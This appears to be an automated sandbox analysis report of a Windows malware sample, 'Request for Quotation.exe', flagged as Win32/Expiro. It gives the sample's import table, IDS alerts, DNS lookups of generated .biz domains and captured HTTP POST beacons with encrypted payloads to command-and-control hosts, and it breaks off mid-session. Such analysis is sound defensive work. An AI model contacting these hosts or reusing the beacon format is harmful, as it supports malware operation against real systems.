RT_STRING | 0xce110 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xce5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xceb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xcf1f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xcf660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xcf7b8 | 0x572af | data | | | 1.0003248944793146
RT_GROUP_ICON | 0x126a68 | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x126ae0 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x126af4 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x126b08 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x126b1c | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x126bf8 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
DLL | Import
WSOCK32.dll | WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll | GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll | InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll | DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll | IsThemeActive
KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll | AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll | StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll | GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll | DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll | LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
Language of compilation system | Country where language is spoken
English | Great Britain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-10T16:40:07.592457+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 54.244.188.177 | 80 | 192.168.2.4 | 49730 | TCP
2024-12-10T16:40:07.592457+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 54.244.188.177 | 80 | 192.168.2.4 | 49730 | TCP
2024-12-10T16:40:11.038990+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 18.141.10.107 | 80 | 192.168.2.4 | 49733 | TCP
2024-12-10T16:40:11.038990+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 18.141.10.107 | 80 | 192.168.2.4 | 49733 | TCP
2024-12-10T16:40:14.844579+0100 | 2850851 | ETPRO MALWARE Win32/Expiro.NDO CnC Activity | 1 | 192.168.2.4 | 49735 | 44.221.84.105 | 80 | TCP
2024-12-10T16:40:15.049057+0100 | 2051648 | ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) | 1 | 192.168.2.4 | 56682 | 1.1.1.1 | 53 | UDP
2024-12-10T16:40:15.089548+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 44.221.84.105 | 80 | 192.168.2.4 | 49735 | TCP
2024-12-10T16:40:15.089548+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 44.221.84.105 | 80 | 192.168.2.4 | 49735 | TCP
2024-12-10T16:40:22.228667+0100 | 2051649 | ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) | 1 | 192.168.2.4 | 53201 | 1.1.1.1 | 53 | UDP
2024-12-10T16:41:56.640663+0100 | 2850851 | ETPRO MALWARE Win32/Expiro.NDO CnC Activity | 1 | 192.168.2.4 | 49836 | 82.112.184.197 | 80 | TCP
2024-12-10T16:41:59.468543+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 47.129.31.212 | 80 | 192.168.2.4 | 49882 | TCP
2024-12-10T16:41:59.468543+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 47.129.31.212 | 80 | 192.168.2.4 | 49882 | TCP
2024-12-10T16:42:01.940809+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 13.251.16.150 | 80 | 192.168.2.4 | 49888 | TCP
2024-12-10T16:42:01.940809+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 13.251.16.150 | 80 | 192.168.2.4 | 49888 | TCP
                                      Dec 10, 2024 16:42:04.450449944 CET804990018.141.10.107192.168.2.4
                                      Dec 10, 2024 16:42:04.450917959 CET4990080192.168.2.418.141.10.107
                                      Dec 10, 2024 16:42:04.455202103 CET4990080192.168.2.418.141.10.107
                                      Dec 10, 2024 16:42:04.455202103 CET4990080192.168.2.418.141.10.107
                                      Dec 10, 2024 16:42:04.574637890 CET804990018.141.10.107192.168.2.4
                                      Dec 10, 2024 16:42:04.574661016 CET804990018.141.10.107192.168.2.4
                                      Dec 10, 2024 16:42:06.457366943 CET804990018.141.10.107192.168.2.4
                                      Dec 10, 2024 16:42:06.457386971 CET804990018.141.10.107192.168.2.4
                                      Dec 10, 2024 16:42:06.457451105 CET4990080192.168.2.418.141.10.107
                                      Dec 10, 2024 16:42:06.457508087 CET4990080192.168.2.418.141.10.107
                                      Dec 10, 2024 16:42:06.576885939 CET804990018.141.10.107192.168.2.4
                                      TimestampSource PortDest PortSource IPDest IP
                                      Dec 10, 2024 16:40:03.220185995 CET6256353192.168.2.41.1.1.1
                                      Dec 10, 2024 16:40:03.939455986 CET53625631.1.1.1192.168.2.4
                                      Dec 10, 2024 16:40:06.573715925 CET5289353192.168.2.41.1.1.1
                                      Dec 10, 2024 16:40:06.814836979 CET53528931.1.1.1192.168.2.4
                                      Dec 10, 2024 16:40:07.914791107 CET6506053192.168.2.41.1.1.1
                                      Dec 10, 2024 16:40:08.397241116 CET53650601.1.1.1192.168.2.4
                                      Dec 10, 2024 16:40:08.457729101 CET6324653192.168.2.41.1.1.1
                                      Dec 10, 2024 16:40:08.697761059 CET53632461.1.1.1192.168.2.4
                                      Dec 10, 2024 16:40:22.227718115 CET53642331.1.1.1192.168.2.4
                                      Dec 10, 2024 16:40:25.770459890 CET53594341.1.1.1192.168.2.4
                                      Dec 10, 2024 16:40:26.009018898 CET53648341.1.1.1192.168.2.4
                                      Dec 10, 2024 16:42:06.458564997 CET4984353192.168.2.41.1.1.1
                                      Dec 10, 2024 16:42:06.995179892 CET53498431.1.1.1192.168.2.4
                                       Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                       Dec 10, 2024 16:40:03.220185995 CET | 192.168.2.4 | 1.1.1.1 | 0xe893 | Standard query (0) | pywolwnvd.biz | A (IP address) | IN (0x0001) | false
                                       Dec 10, 2024 16:40:06.573715925 CET | 192.168.2.4 | 1.1.1.1 | 0x6a87 | Standard query (0) | pywolwnvd.biz | A (IP address) | IN (0x0001) | false
                                       Dec 10, 2024 16:40:07.914791107 CET | 192.168.2.4 | 1.1.1.1 | 0xbaec | Standard query (0) | ssbzmoy.biz | A (IP address) | IN (0x0001) | false
                                       Dec 10, 2024 16:40:08.457729101 CET | 192.168.2.4 | 1.1.1.1 | 0xb684 | Standard query (0) | ssbzmoy.biz | A (IP address) | IN (0x0001) | false
                                       Dec 10, 2024 16:42:06.458564997 CET | 192.168.2.4 | 1.1.1.1 | 0x59f3 | Standard query (0) | fwiwk.biz | A (IP address) | IN (0x0001) | false
                                       Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                       Dec 10, 2024 16:40:03.939455986 CET | 1.1.1.1 | 192.168.2.4 | 0xe893 | No error (0) | pywolwnvd.biz |  | 54.244.188.177 | A (IP address) | IN (0x0001) | false
                                       Dec 10, 2024 16:40:06.814836979 CET | 1.1.1.1 | 192.168.2.4 | 0x6a87 | No error (0) | pywolwnvd.biz |  | 54.244.188.177 | A (IP address) | IN (0x0001) | false
                                       Dec 10, 2024 16:40:08.397241116 CET | 1.1.1.1 | 192.168.2.4 | 0xbaec | No error (0) | ssbzmoy.biz |  | 18.141.10.107 | A (IP address) | IN (0x0001) | false
                                       Dec 10, 2024 16:40:08.697761059 CET | 1.1.1.1 | 192.168.2.4 | 0xb684 | No error (0) | ssbzmoy.biz |  | 18.141.10.107 | A (IP address) | IN (0x0001) | false
                                       Dec 10, 2024 16:40:22.227718115 CET | 1.1.1.1 | 192.168.2.4 | 0xfdf1 | Name error (3) | zlenh.biz | none | none | A (IP address) | IN (0x0001) | false
                                       Dec 10, 2024 16:40:25.770459890 CET | 1.1.1.1 | 192.168.2.4 | 0x4d87 | Name error (3) | uhxqin.biz | none | none | A (IP address) | IN (0x0001) | false
                                       Dec 10, 2024 16:40:26.009018898 CET | 1.1.1.1 | 192.168.2.4 | 0x9154 | Name error (3) | anpmnmxo.biz | none | none | A (IP address) | IN (0x0001) | false
                                       Dec 10, 2024 16:42:06.995179892 CET | 1.1.1.1 | 192.168.2.4 | 0x59f3 | No error (0) | fwiwk.biz |  | 172.234.222.138 | A (IP address) | IN (0x0001) | false
                                       Dec 10, 2024 16:42:06.995179892 CET | 1.1.1.1 | 192.168.2.4 | 0x59f3 | No error (0) | fwiwk.biz |  | 172.234.222.143 | A (IP address) | IN (0x0001) | false
                                      • pywolwnvd.biz
                                      • ssbzmoy.biz
                                      • cvgrf.biz
                                      • knjghuig.biz
                                      • vcddkls.biz
                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                       0 | 192.168.2.4 | 49730 | 54.244.188.177 | 80 | 6584 | C:\Users\user\Desktop\Request for Quotation.exe
                                       Timestamp | Bytes transferred | Direction | Data
                                       Dec 10, 2024 16:40:05.983470917 CET | 359 | OUT | POST /miswwsapbqmsir HTTP/1.1
                                      Cache-Control: no-cache
                                      Connection: Keep-Alive
                                      Pragma: no-cache
                                      Host: pywolwnvd.biz
                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                      Content-Length: 824
                                       Dec 10, 2024 16:40:05.983470917 CET | 824 | OUT | Data Raw: 13 d4 56 ef 78 cf 26 81 2c 03 00 00 6e 96 61 2b b6 b5 78 18 fc 3f b8 04 f0 a5 45 e5 bf b5 13 b7 a2 65 1e c2 c1 93 9c e2 91 7b db 27 5b 45 8b 99 22 c0 b8 f7 00 61 06 1e d7 e6 8a ca 83 10 3a 16 97 68 dd 42 19 78 60 ae dc 53 6b 6a 49 1d c3 1a d7 d7
                                       Dec 10, 2024 16:40:07.328208923 CET | 413 | IN | HTTP/1.1 200 OK
                                      Server: nginx
                                      Date: Tue, 10 Dec 2024 15:40:07 GMT
                                      Content-Type: text/html
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Set-Cookie: btst=bdabc93c32c7affb78f030f3f2f07c1d|8.46.123.175|1733845207|1733845207|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                      Set-Cookie: snkz=8.46.123.175; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                      Data Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                       1 | 192.168.2.4 | 49731 | 54.244.188.177 | 80 |  | 
                                       Timestamp | Bytes transferred | Direction | Data
                                       Dec 10, 2024 16:40:07.069133043 CET | 356 | OUT | POST /hcwjealfbuy HTTP/1.1
                                      Cache-Control: no-cache
                                      Connection: Keep-Alive
                                      Pragma: no-cache
                                      Host: pywolwnvd.biz
                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                      Content-Length: 874
                                       Dec 10, 2024 16:40:07.069181919 CET | 874 | OUT | Data Raw: ff 9a 72 1e f2 9c 18 68 5e 03 00 00 67 c5 f7 53 0d 60 76 52 98 07 53 95 4f 31 a9 2e e5 3f 30 63 e1 fe 73 88 07 e6 9c e4 28 dd 5d 55 71 55 34 4f ee 04 68 4c 9a 87 c8 5c ac 5c f9 da eb cf 32 e7 23 54 fc b0 a8 f4 14 91 6c ac 8e f0 ac 85 b6 0e 60 19
                                       Dec 10, 2024 16:40:08.358298063 CET | 413 | IN | HTTP/1.1 200 OK
                                      Server: nginx
                                      Date: Tue, 10 Dec 2024 15:40:08 GMT
                                      Content-Type: text/html
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Set-Cookie: btst=ecb57a323d6a38489389066d3118b8a3|8.46.123.175|1733845208|1733845208|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                      Set-Cookie: snkz=8.46.123.175; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                      Data Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                       2 | 192.168.2.4 | 49732 | 18.141.10.107 | 80 | 6584 | C:\Users\user\Desktop\Request for Quotation.exe
                                       Timestamp | Bytes transferred | Direction | Data
                                       Dec 10, 2024 16:40:08.779573917 CET | 347 | OUT | POST /njrv HTTP/1.1
                                      Cache-Control: no-cache
                                      Connection: Keep-Alive
                                      Pragma: no-cache
                                      Host: ssbzmoy.biz
                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                      Content-Length: 824
                                       Dec 10, 2024 16:40:08.779602051 CET | 824 | OUT | Data Raw: 69 aa a8 57 82 cc 37 0b 2c 03 00 00 4b 69 d3 6e b9 0b f6 e1 0e 05 7a 38 68 39 c1 52 eb 8f 04 b1 5a 0c 34 a2 57 c0 8b 76 5b a4 3f f7 38 ef cf b0 ff 51 95 ab 67 1a c4 53 76 fe bc e3 b6 8d b6 a7 0b f0 db 17 88 3a cf 50 72 02 b9 7a cf d0 4d ff 0a be
                                       Dec 10, 2024 16:40:10.777882099 CET | 411 | IN | HTTP/1.1 200 OK
                                      Server: nginx
                                      Date: Tue, 10 Dec 2024 15:40:10 GMT
                                      Content-Type: text/html
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Set-Cookie: btst=6eba07ba7a879f9d66656cb54dbea35c|8.46.123.175|1733845210|1733845210|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                      Set-Cookie: snkz=8.46.123.175; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                      Data Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                       3 | 192.168.2.4 | 49733 | 18.141.10.107 | 80 |  | 
                                       Timestamp | Bytes transferred | Direction | Data
                                       Dec 10, 2024 16:40:08.864067078 CET | 345 | OUT | POST /kr HTTP/1.1
                                      Cache-Control: no-cache
                                      Connection: Keep-Alive
                                      Pragma: no-cache
                                      Host: ssbzmoy.biz
                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                      Content-Length: 874
                                       Dec 10, 2024 16:40:08.864188910 CET | 874 | OUT | Data Raw: 66 7a a3 ec f4 a6 de 3c 5e 03 00 00 db fc 2d 67 4a be 5f bf 48 86 ab cb 0c 14 b0 9d ec c0 c1 24 df 36 27 c6 b1 4f e9 39 7f ac 3f 68 f3 c9 04 f9 ce 1d c0 a8 af 6a 81 de a7 dd 02 ec 0f eb 2b 59 9a 07 36 14 2e f5 67 58 26 81 53 f3 25 19 a7 5f 39 d3
                                       Dec 10, 2024 16:40:10.895766973 CET | 411 | IN | HTTP/1.1 200 OK
                                      Server: nginx
                                      Date: Tue, 10 Dec 2024 15:40:10 GMT
                                      Content-Type: text/html
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Set-Cookie: btst=7f5a8d4c2fb8364d9c9f6faec536433a|8.46.123.175|1733845210|1733845210|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                      Set-Cookie: snkz=8.46.123.175; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                      Data Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                       4 | 192.168.2.4 | 49734 | 54.244.188.177 | 80 |  | 
                                       Timestamp | Bytes transferred | Direction | Data
                                       Dec 10, 2024 16:40:11.572777987 CET | 353 | OUT | POST /iropyruplkan HTTP/1.1
                                      Cache-Control: no-cache
                                      Connection: Keep-Alive
                                      Pragma: no-cache
                                      Host: cvgrf.biz
                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                      Content-Length: 874
                                       Dec 10, 2024 16:40:11.573009968 CET | 874 | OUT | Data Raw: 93 98 c8 ac 1a 34 ac 1d 5e 03 00 00 c0 76 44 97 4e b5 70 bc f1 69 1f 3a 22 fb 94 76 4c 05 43 03 f2 c1 dd 76 29 48 bd ed 11 42 67 ad db 32 55 f7 9e d4 16 b5 fb b0 9e dd 31 96 ee f1 11 31 0a 52 18 2d af 6f 04 25 39 27 b0 9e 35 4c 8f f8 9e 9d ad 5c
                                       Dec 10, 2024 16:40:13.014575958 CET | 409 | IN | HTTP/1.1 200 OK
                                      Server: nginx
                                      Date: Tue, 10 Dec 2024 15:40:12 GMT
                                      Content-Type: text/html
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Set-Cookie: btst=48150c474575c0ebec51f0fb95754375|8.46.123.175|1733845212|1733845212|0|1|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                      Set-Cookie: snkz=8.46.123.175; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                      Data Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                       5 | 192.168.2.4 | 49744 | 18.141.10.107 | 80 |  | 
                                       Timestamp | Bytes transferred | Direction | Data
                                       Dec 10, 2024 16:40:23.480609894 CET | 353 | OUT | POST /hgpugagvc HTTP/1.1
                                      Cache-Control: no-cache
                                      Connection: Keep-Alive
                                      Pragma: no-cache
                                      Host: knjghuig.biz
                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                      Content-Length: 874
                                       Dec 10, 2024 16:40:23.480894089 CET | 874 | OUT | Data Raw: d1 13 be 9e c7 a0 0a 18 5e 03 00 00 cd 95 bb ba 08 41 5a b5 00 89 36 9c 38 13 0c 22 26 75 d8 e1 de 69 c3 92 4e 28 60 51 a9 1e b8 0b ec 5a 2f d9 47 e3 24 d5 3b ce ce 15 d7 13 58 7e 70 af ab 29 50 c4 1b e0 94 b5 37 d0 2f 8f 32 f7 d6 e4 c9 aa 19 bc
                                       Dec 10, 2024 16:40:25.451215029 CET | 412 | IN | HTTP/1.1 200 OK
                                      Server: nginx
